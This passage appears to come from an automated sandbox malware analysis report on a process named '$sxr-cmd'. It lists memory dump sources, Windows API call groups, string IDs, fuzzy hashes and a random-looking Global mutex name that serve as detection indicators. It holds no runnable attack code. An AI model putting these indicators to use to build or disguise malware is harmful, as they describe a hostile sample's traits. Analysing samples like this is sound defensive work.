                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                            • String ID: GeToken: (%x) '%s'
                                                                                                            • API String ID: 3282654869-1994581435
                                                                                                            • Opcode ID: 5b3055126f93699daefc779add07b26c723814764b81a484ca01258d4c3fc38c
                                                                                                            • Instruction ID: d053e4bebf331e249e82c3fba73cfeaee1d336a879116b118cd9863367116402
                                                                                                            • Opcode Fuzzy Hash: 5b3055126f93699daefc779add07b26c723814764b81a484ca01258d4c3fc38c
                                                                                                            • Instruction Fuzzy Hash: 7061D461A09E4282FB94AB119490179E294BF49BB4FD44E34CA2E37BD5EE3DE45CC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            • Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                            • Instruction ID: ee4280c032aa6cb4ee40e62a3fd65b66045658d1d079a2e2b548e2038128f8af
                                                                                                            • Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                            • Instruction Fuzzy Hash: A151F932204FA4E2EE259E29905CBEE6652F7F678AFD40055EE4703B59CF39C4098740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memmovewcsncmp
                                                                                                            • String ID: 0123456789
                                                                                                            • API String ID: 3879766669-2793719750
                                                                                                            • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                            • Instruction ID: 494506dfc28bcb4a0c1d9eefac3ccff9a789b562ecc3a72a77e22eab3403b3d8
                                                                                                            • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                            • Instruction Fuzzy Hash: EE412B61F18F8A89EBA1AF25D8002BAA354FB44BE0F945131CE4E63784DE3DD45EC360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID: U
                                                                                                            • API String ID: 442123175-4171548499
                                                                                                            • Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                            • Instruction ID: 0c61de4ea00396ecde54320ebcc6517e578ef15bca519cbb7293546354466d93
                                                                                                            • Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                            • Instruction Fuzzy Hash: BD41C532316E64E1EF209F25E8587D977A1F3A8798F804021EE4E87798DB3CC545CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7138097D0
                                                                                                              • Part of subcall function 00007FF7137ED3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED46E
                                                                                                              • Part of subcall function 00007FF7137ED3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED485
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED4EE
                                                                                                              • Part of subcall function 00007FF7137ED3F0: iswspace.MSVCRT ref: 00007FF7137ED54D
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED569
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED58C
                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7138098D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                            • String ID: Software\Classes
                                                                                                            • API String ID: 2714550308-1656466771
                                                                                                            • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                            • Instruction ID: 39520b6cddd8c362550d21e2c8e715e3fe50095a8fdb4d78a04a2cf0a546154a
                                                                                                            • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                            • Instruction Fuzzy Hash: C6419522A19F5281EB80EB15D485039A3E5FB89BE0F908231DE5D677E1DF3AD469C360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380A0FC
                                                                                                              • Part of subcall function 00007FF7137ED3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED46E
                                                                                                              • Part of subcall function 00007FF7137ED3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED485
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED4EE
                                                                                                              • Part of subcall function 00007FF7137ED3F0: iswspace.MSVCRT ref: 00007FF7137ED54D
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED569
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED58C
                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380A1FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                            • String ID: Software\Classes
                                                                                                            • API String ID: 2714550308-1656466771
                                                                                                            • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                            • Instruction ID: 3fd2701393cc841413e9bd9b0c8bd28628662ba84274f6f49529215c6ed78c2e
                                                                                                            • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                            • Instruction Fuzzy Hash: 12418322A19F5281FB80EB15D444439E3A5FB897E0F908231DE5E677E1DE3ED869C360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleTitle
                                                                                                            • String ID: -
                                                                                                            • API String ID: 3358957663-3695764949
                                                                                                            • Opcode ID: 04e5911cec5ac31099912e2928c40c373e04d3746e7a49c6294d3f0529e6a83a
                                                                                                            • Instruction ID: 6d6c22766f157851e179282fa905d006cddf4f494af12b6dc8f74245fba3444f
                                                                                                            • Opcode Fuzzy Hash: 04e5911cec5ac31099912e2928c40c373e04d3746e7a49c6294d3f0529e6a83a
                                                                                                            • Instruction Fuzzy Hash: 3C31CF21A08A4286EA84BB01A880079EAA4BF4DBB0F954235D91E377D5DF3DE45CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000002155A5B2A4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction ID: caa439a64c63a557851867e8826366e6bb43f891f65d2c14d2bc5ad739481fa2
                                                                                                            • Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction Fuzzy Hash: 2821D336200B68E2EF70CB16A858B9EB392F7E5B99FC50065EE8A43754EF74C449C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsnicmpswscanf
                                                                                                            • String ID: :EOF
                                                                                                            • API String ID: 1534968528-551370653
                                                                                                            • Opcode ID: 16430380be0fb913083b6884b205c0f5113cd8b1b31c6669d47242da84fc884d
                                                                                                            • Instruction ID: d809dfce2f71f723b20d044913a071886b211260a99436cb14a6e68ddab74a23
                                                                                                            • Opcode Fuzzy Hash: 16430380be0fb913083b6884b205c0f5113cd8b1b31c6669d47242da84fc884d
                                                                                                            • Instruction Fuzzy Hash: 6E316431A0CE8286FB94AB15A880278F2A4FF4DBB0FC45131EA5E66255DF2DE45DC670
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000002155A5B2B39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction ID: a2d2b3765d5566fc535deb5481a221b3e67e42b63da4ebb7938c5459fdc5611b
                                                                                                            • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction Fuzzy Hash: 30219532600B68E1EB60DF16B858B9E7396F7E5B59FC440A5EE4A83754DF34C44A8740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsnicmp
                                                                                                            • String ID: /-Y
                                                                                                            • API String ID: 1886669725-4274875248
                                                                                                            • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                            • Instruction ID: a4ff5315de984a308d83d7a0f11df5ce07f22c725fa14030701758a880839cec
                                                                                                            • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                            • Instruction Fuzzy Hash: FA217166B08B6585FB90AB069484178F6E1BB48FE0F844131DE88377A4DE3DE49AD320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Stringtry_get_function
                                                                                                            • String ID: LCMapStringEx
                                                                                                            • API String ID: 2588686239-3893581201
                                                                                                            • Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                            • Instruction ID: cf1b401c50bb954322ce52191aa9d4d6face2bd4a6695e9a50dad3f9eb3ae4b5
                                                                                                            • Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                            • Instruction Fuzzy Hash: 9D112736608B90D6EB60CB06F444B9AB7A1F7D9B94F944126FE8E83B19CF38C4448B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                            • Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                            • Instruction ID: cbd19f21f2eb2a836f97a28860ed2d3f289efaa0650a263032afe03aec52d7de
                                                                                                            • Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                            • Instruction Fuzzy Hash: 43116D32214B54D2EF108B25F444699B7E6FBE8B98F584260EF8D077A8DF39C455C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 3$3
                                                                                                            • API String ID: 0-2538865259
                                                                                                            • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                            • Instruction ID: a1d4ae5e424480fe777dde601b0f98f35c6c1d68da56bcc8342f330b37f177df
                                                                                                            • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                            • Instruction Fuzzy Hash: 660112B190E982CAF794AB65A8C5674EA60BB58331FE40635C40F215A1CE3E64ADC671
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                            • API String ID: 539475747-3084827643
                                                                                                            • Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                            • Instruction ID: 889d794c6211ed9e91ca4ed19899eff68e14e220b7ae6a272dc37c55464e69d9
                                                                                                            • Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                            • Instruction Fuzzy Hash: B2F0B436205F64E1FF065B41B458ED46272FBD8B94FC440A1BA1A03B58CF38C489C710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Valuetry_get_function
                                                                                                            • String ID: FlsSetValue
                                                                                                            • API String ID: 738293619-3750699315
                                                                                                            • Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                            • Instruction ID: 1edb938eee0abe502b56b26512bf067a7cad471a07002fa073cbbe5c95b2e994
                                                                                                            • Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                            • Instruction Fuzzy Hash: B3E03072201E14F2FE055B55B85CED86233B7E8B89FD84066FA1A06259DF3CC45DC610
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06D6
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06F0
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F074D
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F0762
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1617791916-0
                                                                                                            • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                            • Instruction ID: 7ab4990203ef10dc7ef61f51961389030b82607b9129b8a1602feefaaaf1014c
                                                                                                            • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                            • Instruction Fuzzy Hash: 2E416D72A09A4286EB95AB10E480179F7A4FB49B60F948434D65E23754DF3DE45CCB70
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 756756679-0
                                                                                                            • Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                            • Instruction ID: b2214b8c1a40b8ee7f2e91d4f4a8e7b35eb6d8a13a1a2d280d35a8888d4009e0
